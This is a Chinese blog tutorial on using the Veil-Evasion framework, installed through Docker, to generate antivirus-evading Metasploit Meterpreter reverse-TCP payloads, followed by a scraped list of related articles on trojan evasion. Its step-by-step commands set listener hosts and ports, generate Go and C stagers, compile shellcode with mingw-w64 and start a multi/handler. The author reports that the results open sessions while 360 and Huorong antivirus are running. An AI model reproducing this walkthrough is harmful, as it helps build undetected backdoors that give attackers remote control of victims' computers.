远控免杀5---Veil免杀
0x01 免杀能力一览表
- 1、下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
- 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
- 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12.12),火绒版本5.0.33.13(2019.12.12),360安全卫士12.0.0.2001(2019.12.17)。
- 4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。
0x02 前言
Veil、Venom和Shellter是三大老牌免杀工具,虽然说人怕出名猪怕壮,但目前这几款免杀工具在扩展性和免杀能力方面依然有着不错的表现。
Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避了常见防病毒产品的检测。
0x03 安装Veil
常规安装失败
veil地址:https://github.com/Veil-Framework/Veil
安装参考https://www.freebuf.com/sectool/89024.html
kali快速安装
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
看起来没什么问题,但后来在执行的时候各种出错,依赖包各种出问题,无论是快速安装还是常规手工安装都没能解决。网上也有很多人吐槽安装比较繁杂,出现各种状况,但也有的系统安全比较顺利。
后来,发现有人做好了veil的docker镜像,简单便捷,一键运行。
Docker安装
安装docker
apt-get install docker docker-compose
安装完成后启动:
service docker start
在kali里安装docker后,添加docker加速镜像地址vi /etc/docker/daemon.json
{"registry-mirrors": ["https://1nj0zren.mirror.aliyuncs.com","https://docker.mirrors.ustc.edu.cn","http://f1361db2.m.daocloud.io","https://registry.docker-cn.com"]
}
然后重启docker服务
systemctl daemon-reload
systemctl restart docker
拉取veil镜像
docker pull mattiasohlsson/veil
拉取成功后,执行
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
-v /tmp/veil-output:/var/lib/veil/output:Z
是将宿主机的/tmp/veil-output目录映射到docker里面,这样veil生成的payload可以直接在宿主机里使用。
使用exit命令退出,使用下面命令查看container
docker ps -a
之后再进入镜像可以在启动镜像后使用下面命令:
docker start -ai a323f16bcf59 (替换成自己查的ID)
运行起来后,之后再进入镜像可以在启动镜像后使用下面命令
docker exec -it a323f16bcf59 (替换成自己查的ID) /bin/bash
执行veil命令可启动,版本为3.1.1。
0x04 veil使用
veil有两个免杀的工具,Evasion和Ordnance。
Ordnance可生成在Veil-Evasion中使用的shellcode,Evasion是用做文件免杀。
我们一般选择Evasion:
Veil>: use 1 #选择Evasion功能
Veil/Evasion>: list #查看payload列表
使用list可以看到到41种stager
推荐使用以go和ruby语言encode的编码方式。像python这类的与用户有较高的交互就容易被查杀。
veil原理可以参考这篇文章:https://xz.aliyun.com/t/4191
1、使用veil直接生成exe
veil可以直接生成支持msf的payload,我们先试一下看看效果。
我们使用go语言生成msf的payload
Veil/Evasion>: use 16
设置好msf的监听主机和端口就可以,下图所示
set lhost 192.169.128.142
set lport 5555
generate
然后再设定好生成的payload的名称,我这里就用go_msf了
然后一堆编码编译之后,就生成payload了
因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
在msf中监听:
use multi/handlermsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 3334
msf5 exploit(multi/handler) > set lport 10.211.55.2
msf5 exploit(multi/handler) > exploit
在测试主机执行go_msf.exe,发现msf中可上线
而此时是正常打开360和火绒的
Veil真NB!
虽然查杀率还比较高,不过火绒和360都能静态+动态免杀。比较遗憾的是生成的exe文件比较大,go语言生成的exe大约2M,python生成的exe大约4M,ruby生成的exe大约700K,相比msf原生态的exe大打多了。
2、使用veil+mingw-w64
先用veil生成shellcode
use 7
[c/meterpreter/rev_tcp>>]: set lhost 192.168.142.134
[c/meterpreter/rev_tcp>>]: set lport 5555
[c/meterpreter/rev_tcp>>]: generate
输入生成文件名为c_msf
文件在/tmp/veil-output/source文件夹下
先生成一个可以被 msf 利用的 c_msf.c 然后用mingw-w64 来编译
mingw-w64的安装可参考https://zhuanlan.zhihu.com/p/76613134
gcc -o payload.exe c_msf.c -l ws2_32
运行生成的payload.exe文件,msf成功上线
全程开启360卫士和杀毒以及火绒,编译、运行、上线都没有问题。
0x05 小结
veil功能还是很强大的,生成的shellcode自身免杀能力就不错,而且支持多种语言的shellcode编译打包,和msf及cs可以无缝对接,值得人好好研究一下。三大老牌免杀工具不是浪得虚名的
0x06 参考整理
使用veil绕过杀软:https://blog.csdn.net/wyf12138/article/details/79825833
免杀后门之MSF&Veil-Evasion的完美结合http://www.secist.com/archives/1107.html
APT级的全面免杀:https://xz.aliyun.com/t/4191
远控免杀5---Veil免杀相关推荐
- 远控软件GHOST源码免杀
<script type="text/javascript"></script> 远控软件gh0st源码免杀 远控软件gh0st3.6开源了,开源意味着我们 ...
- 远控软件gh0st源码免杀之我谈
远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控木马,既然要利用,我们就做好源码基础上的木马免杀工作. 好久没有来博客了,我把免杀这部 ...
- “白加黑”远控木马技术分析及手杀方案
"白加黑"是民间对一种DLL劫持技术的通俗称呼,现在很多恶意程序利用这种劫持技术来绕过安全软件的主动防御以达到加载自身的目的,是目前很火的一种免杀手段.本文将针对此类病毒做了一个简 ...
- 灰鸽子远控软件使用及xuetr查杀
灰鸽子远控软件 这里靶机是2003,别的不一定管用 重新配一个 壳的左右除了减小体积,还可以对其加密 假如这个木马做了免杀,我们怎么去发现他 按进程,启动项,服务,计划任务等一个一个找 手工删除
- linux常用免杀,【kali linux】详细分析两个免杀远控 了解远控和免杀原理
该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 Hi 大家好 我是杰爱蓝莓 今天起跟大家从源代码分析两个免杀的远控 让大家能够了解远控程序的原理,以及免杀技术实现的一些原理 两个远控 1:用Python ...
- “大灰狼”远控木马分析及幕后真凶调查
9月初360安全团队披露bt天堂网站挂马事件,该网站被利用IE神洞CVE-2014-6332挂马,如果用户没有打补丁或开启安全软件防护,电脑会自动下载执行大灰狼远控木马程序. 鉴于bt天堂电影下载网站 ...
- BT天堂网站挂马事件后续:“大灰狼”远控木马分析及幕后真凶调查
9月初安全团队披露bt天堂网站挂马事件,该网站被利用IE神洞CVE-2014-6332挂马,如果用户没有打补丁或开启安全软件防护,电脑会自动下载执行大灰狼远控木马程序. 鉴于bt天堂电影下载网站访问量 ...
- 远控免杀专题(9)-Avet免杀(VT免杀率14/71)
本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...
- 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
最新文章
- GitHub分享《深度学习500问》优质资源
- 大厂项目是如何死掉的?太过真实!
- Ubuntu16下安装kaldi(使用物理主机)
- 【mysql】linux安装mysql
- POJ 2230 DFS
- 新认知,新力量!神策 2021 数据驱动大会来了
- Apache Camel 3.1 –更多骆驼核心优化(第3部分)
- ORM框架SQLAlchemy使用学习
- 关于TortoiseGit汉化包装了,但仍然是英文菜单的问题记录
- 浅谈 标准的代号和编号
- LVS-DR负载均衡-02
- Python数据结构与算法(1.3)——Python基础之输入、输出与高阶赋值
- Git教程_2 所有操作讲解
- 电子设计竞赛方案搜集
- 如何 设置CTEX WinEdt 改变默认的 PDF viewer
- 装配标准工时如何计算?详解:装配的标准工时计算方法
- 爬虫 (7)—— 爬取网络小说,详细分析及代码
- 尚学堂马士兵java多线程部分笔记
- Rundll32.exe使用方法大全
- TCP: too many of orphaned sockets报错解决
热门文章
- transition
- MongoDB存储基础教程
- Zabbix全方位告警接入-电话/微信/短信都支持
- SOJ 2800_三角形
- Delphi 一些函数解释
- 【Web后端笔记】SQL Server与java数据类型对应
- 使用PHP创建一个REST API(Create a REST API with PHP)
- c语言中的两个百分号什么意思,百分号的用法,特别是在两个量词之间的用法,例如50%—70%和50—70%...-百分号-语文-彭都宰同学...
- matlab中求积函数,MATLAB软件及高斯勒让德求积公式MATLAB软件及高斯勒让德求积公式.doc...
- python数据挖掘电影评分分析_Pyhon数据分析项目——男女电影评分差异比较